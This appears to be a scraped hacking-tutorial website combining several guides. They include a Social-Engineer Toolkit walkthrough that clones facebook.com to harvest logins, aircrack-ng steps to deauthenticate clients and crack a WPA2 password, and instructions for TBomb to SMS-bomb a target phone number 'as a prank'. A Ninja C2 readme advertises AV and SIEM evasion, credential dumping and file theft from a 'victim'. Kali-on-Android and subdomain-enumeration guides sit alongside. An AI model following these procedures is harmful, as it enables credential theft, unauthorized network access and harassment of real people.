Search Results

To see this working, head to your live site. Categories All Posts My Posts Forum Welcome! Have a look around and join the discussions. Create New Post General Discussion Share stories, ideas, pictures and more! subcategory-list-item.views subcategory-list-item.posts 3 Follow Questions & Answers Get answers and share knowledge. subcategory-list-item.views subcategory-list-item.posts 0 Follow New Posts coding lab Apr 15, 2022 Welcome to the Forum General Discussion Share your thoughts. Feel free to add GIFs, videos, #hashtags and more to your posts and comments. Get started by commenting below. Like 0 comments 0 coding lab Apr 15, 2022 Introduce yourself General Discussion We'd love to get to know you better. Take a moment to say hi to the community in the comments. Like 0 comments 0 coding lab Apr 15, 2022 Forum rules General Discussion We want everyone to get the most out of this community, so we ask that you please read and follow these guidelines: • Respect each other • Keep posts relevant to the forum topic • No spamming Like 0 comments 0 Forum - Frameless

KALI LINUX HACK TUTORIALS AND TOOLS TUTORIAL Anytime, Anywhere TUTORIAL TUTORIAL HERE For All Major Home Appliances domE - Our tool to list subdomains VIEW TUTORIAL For All Major Home Appliances NINJA C2 SERVER Anytime, Anywhere read now WE DELIVER WORLDWIDE READ MORE FAKE SMS SENDER READ TUTORIAL For All Major Home Appliances

welcome to kali linux coding lab HOME kali linux tools facebook phishing wifi password hack sms and email bomb domE tool install kali linux to android ninja open source c2 server group chat Plans & Pricing Forum Groups List Members Search Results about kali linux Kali Linux is a Debian -derived Linux distribution designed for digital forensics and penetration testing .[3] It is maintained and funded by Offensive Security Requirements Kali Linux requires: A minimum of 20GB hard disk space for installation depending on the version, Version 2020.2 requires at least 20GB.[17] A minimum of 2GB RAM for i386 and AMD64 architectures. A bootable CD-DVD drive or a USB stick. A minimum of an Intel Core i3 or an AMD E1 processor for good performance. The recommended hardware specification for a smooth experience are: 50 GB of hard disk space, SSD preferred At least 2048 MB of RAM READ MORE HACKING TOOLS INSTALL TO ANDROID OUR FORUM GROUP CHAT COMMUNITY

FACEBOOK PHISHING PAGE Open the terminal window in Kali and make sure you have root access as ‘setoolkit’ needs you to have root access 🔹Type ‘setoolkit’ in the command lineYou will be warned that this tool is to be used only with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purposes. 🔹Type y to agree to the conditions and use the tool A menu shows up next. Enter 1 as the choice as in this demo we attempt to demonstrate a social engineering attack. Under Social Engineering, there are various computer-based attacks and SET explains each in one line before asking for a choice. Enter 3 which will select the ‘Credential Harvester Attack Method’ as the aim is to obtain user credentials by creating a bogus page that will have certain form fields. Now, the attacker has a choice to either craft a malicious web page on their own or to just clone an existing trustworthy site. Enter 2 in order to select ‘Site Cloner’ This might take a moment as SET creates the cloned page. Now you need to see the IP address of the attacker machine. Open a new terminal window and write ifconfig Copy the IP address stated in ‘inet’ fieldSET will ask you to provide an IP where the credentials captured will be stored. Paste the address that you copied in the earlier step. Since we chose to clone a website instead of a personalized one, the URL to be cloned is to be provided. In this example, it is www.facebook.comSocial Engineering Toolkit needs Apache Server running as captured data is written to the root directory of Apache. Enter y when prompted about starting the Apache process.

Install Kali Linux on Android In this article, we will look at how to install Kali Linux on android device (non-rooted). That opens a whole new world of possibilities that you can do with your smartphone. Instead of carrying your heavy laptop around, you can go with your phone and still perform penetration testing like you would with your Kali Desktop. Unfortunately, you might be limited to specific resources and capabilities. For example, performing a Reverse Engineering or Malware analysis with your phone won't be that smooth. However, tasks like social engineering can come in quite handy. With that in mind, let's dive in and get started. Requirements An active internet connection Download and Install F-Droid Install Termux from F-Droid Install Hacker's Keyboard from Google Playstore. Install Nethunter Kex app available on Nethunter Store Enough storage space on your device ​ ​ ​ Step 1: Install F-Droid Download and install F-Droid APK from the official F-Droid website . ​ Step 2: Install Termux from F-Droid NOTE: Even though Termux is readily available on Google Play Store, you are highly advised to download Termux from F-Droid or GitHub . The play store version for Termux no longer receives updates, and you will most likely run into errors when using the app. ​ Step 3: Install Nethunter Kex App The Nethunter Kex application will enable you to access the Desktop Interface for Kali Linux on your Android. You can easily download and install the APK file from the Nethunter Store website. Step 4: Install Hacker’s Keyboard Install Hacker's Keyboard by Klaus Weidner, as shown in the image below. ​ Step 5: Enable Hacker’s Keyboard Unlike your standard Android keyboard, the Hacker's keyboard brings the keyboard's functionality on your laptop to your phone. It comes with Arrow keys, Tab keys, Ctrl keys, and Esc keys. It also supports multitouch as the keyboard is based on AOSP Gingerbread soft keyboard. Launch the Settings app on your phone and locate the "Manage Keyboard" option. Enable the Hacker's keyboard, as shown in the image below. ​ Step 6: Setup the Environment Launch Termux on your phone and update and upgrade the system using the command below. NOTE: Termux doesn't give you a Graphical interface. Instead, all you get is a command-line shell where you can execute commands. If you have worked with Linux systems before, this shouldn't be a big deal. If you are a newbie to Linux systems, don't worry. Just execute the commands on this article until we have a fully Kali Linux Desktop system running on our Android device. pkg update && pkg upgrade -y ​ Up to this point, Termux has limited access to the filesystem. Therefore, any files created by Termux outside the current session won't be accessible. To solve that, run the command below: termux-setup-storage You will see a message like "Allow Termux access photos, media and files on your device." Click Allow. When done, execute the command below to install some packages needed to install Kali Linux on android. Step 7: Fetch and Run the Installer Script Now the steps to install Kali Linux on Android phone is relatively straightforward than you would think. We will download the installer script, run it and wait for the script to install Kali. To get started, download the script with the command below. wget https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-project/raw/master/nethunter-rootless/install-nethunter-termux When you run the ls command, you will see a file called.'install-nethunter-termux'. To make this script executable, run the command below. chmod +x install-nethunter-termux To run the script, execute the command below: ./install-nethunter-termux The script will download and install Kali Linux files on your phone. These files might be around 1.5GB; therefore, depending on your internet connection, depending on your internet connection, it might take some time. After successfully install Kali Linux on Android phone, you should see a screen similar to the image below. Step 8: Launch Kali Linux on Android Up to this point, Kali Linux is downloaded and installed on your Android phone. However, you will notice that you are still not getting the Kali shell prompt. To launch Kali, type the command below and hit Enter. nethunter You will now drop to the Kali Linux console as shown in the image below: ​ You can now use Kali Linux tools and commands just like you would on a Kali Desktop running on your laptop. To get started, execute the command below to check the OS and OS-version. cat /etc/os-release | grep "\bNAME=" Step 9: Enable Kali Linux Graphical User Interface on Android Up to this point, you can only use Kali Linux using the command-line prompt on the Termux. Luckily, there is a way you can easily access and use the default XFCE Desktop environment, which comes installed on Kali Linux. This procedure uses straightforward logic. We will use the Win-Kex utility. A tool that enables users running Kali Linux via WSL access the Kali Desktop Interface on their Windows PC. Kex works by creating a VNC session on Kali Linux, and you can access the running session graphically using a Kex-client utility like Nethunter-kex. Follow the steps below to get started. Launch the Termux application and type nethunter to open the Kali Linux shell prompt. On the Kali Linux console, type kex and hit Enter. You will see a prompt to set up a VNC password. Enter your Password and confirm. NOTE: VNC passwords have a limit of up to 8 characters. If you set a password of more than eight characters, it is truncated to 8 (by default). Next, you will see a prompt to set a "view-only password." Type 'N' for no and hit Enter. To start Kex on your Android phone, run the command below: kex start Step 10: Connect to Kali Linux instance on Android Now, launch the Nethunter application and enter the settings shown in the image below. Luckily most of the fields are filled automatically. All you need to type is the Password. You don't need to type the VNC username. When done, click Connect. That will launch Kali Desktop on your Mobile Phone in landscape mode, as shown below. Congratulations! You are now running the full-featured Kali Linux operating system on your Android phone. Of course, navigating through the tiny menus can be a little difficult, but luckily you can use the cursor and using your phone touchscreen as the touchpad/mouse for control. To stop the VNC server, switch to the Termux application and type the command below: kex stop ​

Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system. Step 2: Stop the current processes which are using the WiFi interface. airmon-ng check kill Step 3: To start the wlan0 in monitor mode. airmon-ng start wlan0 Step 4: To view all the Wifi networks around you. airodump-ng wlan0mon Step 5: To view the clients connected to the target network. airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon Step 6: Open a new terminal window to disconnect the clients connected to the target network. aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon Step 7. To decrypt the password. Open the Files application. Here, hacking-01.cap is the file you need. aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program -a : -a2 for WPA2 & -a for WPA network -b : The BSSID of the target network -w : Location of the wordlist file /root/hacking-01.cap : Location of the cap file MORE INFO FOR COME OUR WEB SITE | LINK AVAILABLE IN BIO #kalilinux #kalilinuxtools

TheSpeedX / TBomb – Call and SMS Bomber for Kali Linux TBomb is a free and open-source tool available on GitHub which is used to perform call and SMS bombing on the target phone number. This is the best tool for performing pranks on someone. This tool is written in python, so you must have python installed in your kali linux operating system. This tool works with open-source intelligence APIs that’s why this tool requires an internet connection to perform bombing. This tool doesn’t take your phone number, you only have to enter the target phone number and the tool will do the rest of the work. You must ensure that you always install the latest version of TBomb from GitHub in order to not get stuck with the working of the tool. Installation Step 1: Open your kali linux operating system and use the following command to install the tool from GitHub and then move to the tool directory using the second command. ​ git clone https://github.com/TheSpeedX/TBomb.git cd TBomb Step 2: Now you are in the TBomb directory, use the following command to run the tool. ​ bash TBomb.sh The tool has been installed successfully and running successfully. Now we will have an example of using the tool. ​ Example 1: Use the TBomb tool to perform SMS Bombing on a phone number. For SMS bombing press 1 ​ 1 after that give all the details to the tool such as country code, phone number, number of SMS you want to send etc. THANKS FOR USING OUR WEBSITE

Subscribe to Site First Name Last Name Email I want to subscribe to your mailing list. Submit Thanks for submitting!

Ninja C2 is an Open source C2 server created by Purple Team to do stealthy computer and Active directory enumeration without being detected by SIEM and AVs, Ninja still in beta version and when the stable version released it will contain many more stealthy techniques and anti-forensic to create a real challenge for the blue team to make sure all the defenses configured correctly and they can detect sophisticated attacks. Ninja uses python to server the payload and controls the agents. the agents are based on C# and PowerShell which can bypass leading AVs. Ninja communicates with the agents in secure channel encrypted with AES-256 and the key is not hardcoded but randomly generated on the campaign start, every agent connect to the C2 get the key and if the C2 restarted a new key will be used by all old agents and the new. Ninja also randomizes the callback URLs for every campaign to bypass static detection. The main feature in Ninja is called DA ( Defense Analysis ), which will do the required enumeration to get below important information and do analysis on them to get a score for system defenses and sandbox detection. Detect SIEM solutions: right now it detects SPlUNK , Log beat collector, sysmon. detect AV using two ways, using PowerShell command and using processes. check if the PowerShell logging enabled check if the user has admin privileges provide information about the system : host name , OS , build number , local time , time zone , last boot and bios . provide information about the installed security updates. provide a System pwn hardness score based on multiple factors. provide a sandbox detection score based on ( privileges , bios manufacturer , joined to domain or not , existence of sysinternals processes ). show all domain users ( using PowerShell commands ). show all domain groups ( using PowerShell commands ). show all domain computers ( using powerview.ps1 - taken from: https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 ). show available shares. Ninja is designed to be easy to setup and to add more commands and do automation for boring tasks. you can find many short commands that a red teamer struggle to memorize and search for them. please check this article to know more about ninja: https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/ Ninja key features Ninja is packed with a number of features that allows you to gain an insight into your upcoming engagement before you actually need to deploy your full arsenal of tools and techniques, such as: Defense Analysis automation for kerberoast attack from generating the kerberos tickets to extracting the SPN hashes into hashcat format. automation for dc_sync to get hashes for a list of users or domain admin group. Undetected Automation to get groups the user belongs to and the user's member in a group. Automation for bloodhound AD data collection. customized c# payloads that encrypt strings to bypass static detection. encode any command you want to unicode base64 to be used in PowerShell encoded commands. full encryption of all communications between Agent and command and control to bypass AV and IPS detection. dynamic URLs for all functions, just place your list of URL names and the c2 will use it randomly to bypass any static detection. get random encryption key on the fly ( not hardcoded ) every time the agent connect ( even reconnection needs a new key ) take screenshots and send it encrypted to C2 upload files from C2 to victim encrypted to bypass AV and IPS download files from the victim encrypted to bypass AV and IPS staged payloads to bypass detection ( base64 and base52 ) bypasses AVs ( tested on kaspersky and trendmicro ) Bypasses SIEM detection ( tested on splunk collecting usual event logs along with sysmon logs ) not tested on PowerShell v5 script block and module logging ( will be done in the next release ). set the beacon interval dynamically even after the agent connected and provide a starting beacon interval in the campaign start configurations logging for all commands and results in order to return to any data you missed in your operation. set the configuration one time when you start the campaign and enjoy it. global kill switches to end campaigns. delete table entries. all the payload is written to payloads folder for easy access and further customization. easy to add automation for any command you want. Requirement Please note that compling C# depends on the System.Management.Automation.dll assembly with SHA1 hash c669667bb4d7870bc8bb65365d30071eb7fb86fe. Some Ninja Commands require below modules ( already exist in modules ) which you need to get updates from their repo : Invoke-Kerberoast : https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1 Invoke-Mimikatz : https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 Sharphound : https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1 PowerView : https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 Installation First of all, make sure to download the latest version of Ninja using the following command : git clone https://github.com/ahmedkhlief/Ninja/ You need to setup Ninja by running install.sh script : chmod +x ./install.sh sudo ./install.sh After that you need to initialize the campaign : python start_campaign.py Now you can start the Ninja server : python Ninja.py You will be greeted with the following once you run it : Usage Please check this article about Ninja and how to use it : https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/ . Todo Enhance DA module and add more SIEM , AV and sandbox detection along with more important enumeration data. more focus on stealth to load agent parts only when needed add more shortened commands for popular modules add more customizations and ideas for phishing using C# payloads and macros integration with curveball exploit integration with new exchange RCE Undetectable Persistence create a wipe command to securely remove files on hard disk without being detected and analyzed by the blue team. make the agent blocks changes randomly to bypass any static detection add obfuscation for the agents. integrate cobalt strike payloads ​

Download Surely some of you thought I had stopped publishing articles on the web, but no. For a month now I have been developing a new tool for subdomain enumeration. Due to the work and other issues I have not been able to do both at the same time so I have dedicated myself 100% to the creation of the tool. But let's get to the mess. I present Dome , a tool written in python that lists subdomains both passively and actively and also shows the ports it has open. It is a perfect tool for Bug Bounty Hunters and Pentesters during the enumeration phase. Through its two modes we can perform active or passive scans if what we want is to be undetectable. Passive mode This mode uses OSINT techniques to obtain subdomains. This mode does not make any requests to the domain so it is undetectable. To use 100% of the search engines, fill in the config.api file with the corresponding APIs. The basic use of this mode is: python dome.py -m passive -d domain Active mode This mode performs brute force using two techniques to obtain valid subdomains. Pure Brute Force: This scan lists subdomains from a.dominio.com to zzz.dominio.com. (26¹ + 26² + 26³ = 18278 different subdomains). This mode can be disabled by -nb, --no-bruteforce Using dictionary: This mode uses a dictionary provided by the user using the argument . if this argument is not specified when you run the program this mode will not run-w, --wordlist The active mode will also run the passive mode but in this case, the subdomains found will be tested to see if they are still active. To disable passive scanning you must use the argument --no-passive The basic use of this mode is: python dome.py -m active -d domain -w wordlist.txt If you also want to perform a port scan, you can use the option or use an argument that specifies the "top ports" to use (section use)-p Installation You can run Dome on Linux or Windows with Python 2 or 3 although we recommend using Python 3 Install the dependencies and run the program: git clone https://github.com/v4d1/Dome.git cd Dome pip install -r requirements.txt python dome.py --help Main features of Dome Easy to use, just install the requirements and run it Active and passive scanning (read above) 7 different resolvers including Google, CloudFare (the fastest, Quad9 and Cisco DNS (use to use a custom list of resolvers, one per line)--resolvers filename.txt 20+ different OSINT fonts Passively obtained subdomains are tested to see if they are still available (active mode only) Support for websites that require API tokens Detects when an API key no longer works (Other tools throw an error and stop working) Wildcard DNS detection and bypass Custom port scanning or using the Top100 Top1000 or TopWeb arguments Output with colors for better reading Support for Windows and Linux as well as python 2 and 3 (Python 3 recommended) Highly customizable through arguments Ability to scan more than one domain simultaneously Ability to use threads for faster scans Export the results in different formats such as txt, json or html OSINT search engines dome uses the following websites to get the subdomains in passive mode No API: AlienVault HackerTarget RapidDNS ThreatMiner urlscan.io threatcrowd.org web.archive.org crt.sh bufferover.run CertSpotter Anubis-DB Hunt.io Sound SiteDossier DNSrepo With API: VirusTotal Shodan Spyse SecurityTrails PassiveTotal BinaryEdge Arguments ArgumentsDescriptionExample -m, –modeScan mode: active or passiveactive -d, –domainDomains to analyze (if there are several, separate them by comma)hackerone.com,facebook.com -w, –wordlistFile with the subdomains to testsubdomains-5000.txt -i, –ipWhen a subdomain is found, it displays the IP on which it is hosted –no-passiveDo not use OSINT techniques to obtain subdomains -nb, –no-bruteforceDo not do pure brute force -p, –portsScan the TCP ports of the found subdomains80,443,8080 –top-100-portsScans the Top 100 ports (Not compatible with the -p option) –top-1000-portsScans the Top 1000 ports (Not compatible with the -p option) –top-web-portsScans the Top Web ports (Not compatible with the -p option) -s, –silentSilent mode. Shows nothing per screen –non-colorDisplays output without color -t, –threadsNumber of threads to use (Default: 25)20 -or, –outputSave the results in txt, json and html files –max-response-sizeMaximum size for HTTP responses (Default:5000000 (5MB))1000000 –r, –resolvers Text file with the resolvers to use. One per row. resolve.txt -h, –helpHelp command –versionDisplays the Version of Dome and Ends -v, –verboseDisplays additional information during execution Examples Performs active and passive scanning, displays the associated ip and performs a port scan using the top-web-ports. In addition, save the results in /results: python dome.py -m active -d domain -w wordlist.txt -i --top-web-ports -o --verbose` Perform a passive scan in silent mode and write the results to the /results folder: python dome.py -m passive -d domain --silent -o Performs active scan and port scanning but NOT passive scanning: python dome.py -m active -d domain -w wordlist.txt --no-passive Perform brute force only based on dictionary: python dome.py -m active -d domain -w wordlist.txt --no-bruteforce Performs active and passive scanning and scans only ports 22,80,3306 python dome.py -m active -d domain -w wordlist.txt -p 22,80,3306

Choose your pricing plan bronze membership රු. 0 0රු. RECOMMEND Valid for one week Select 25 LIKES 10 FOLLOWERS READ PRIVATE ARTICLE AND MORE FEATURE SILVER MEMBERSHIP රු. 50 50රු. RECOMMEND FOR YOU Valid for 2 weeks Select 50 LIKES 20 FOLLOWERS 10 COMMENTS READ VIP ARTICLES FREE LINUX TOOL GOLD MEMBERSHIP රු. 125 125රු. HIGH RECOMMEND FOR YOU Valid for 2 weeks Select 100 LIKES 25 FOLLOWERS 10 COMMENTS READ VIP ARTICLES FREE LINUX TOOLS